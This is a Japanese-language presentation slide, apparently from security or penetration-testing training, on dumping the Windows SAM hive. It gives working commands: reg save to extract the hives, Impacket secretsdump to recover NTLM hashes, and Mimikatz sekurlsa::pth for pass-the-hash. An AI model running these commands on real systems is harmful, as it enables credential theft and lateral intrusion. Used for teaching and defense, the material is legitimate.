Slide 21
Slide 21 text
SAM Dump
• ローカルアカウントの情報を保持しているレジストリ(SAM)を復号す
ることで、コンピュータのローカルアカウントのNTLMハッシュを窃取可
能。 NTLMハッシュはそのまま認証に使える(Pass The Hash)。他の
コンピュータに設定されているアカウントのパスワードがダンプしたコン
ピュータのものと同様の場合、Pass The Hashで侵入できる可能性。
SAM、SYSTEM、SECURITYハイブを抽出
> reg save hklm¥sam sam.hive(system, securityも同様にダンプ)
Impacketのsecretsdumpで復号
> secretsdump –sam sam.hive –system system.hive –security security.hive
LOCAL
Mimikatz(管理者権限)でPass The Hash
# privilege::debug
# sekurlsa::pth /user:targetuser /domain:. /ntlm:targethash /run:cmd.exe
21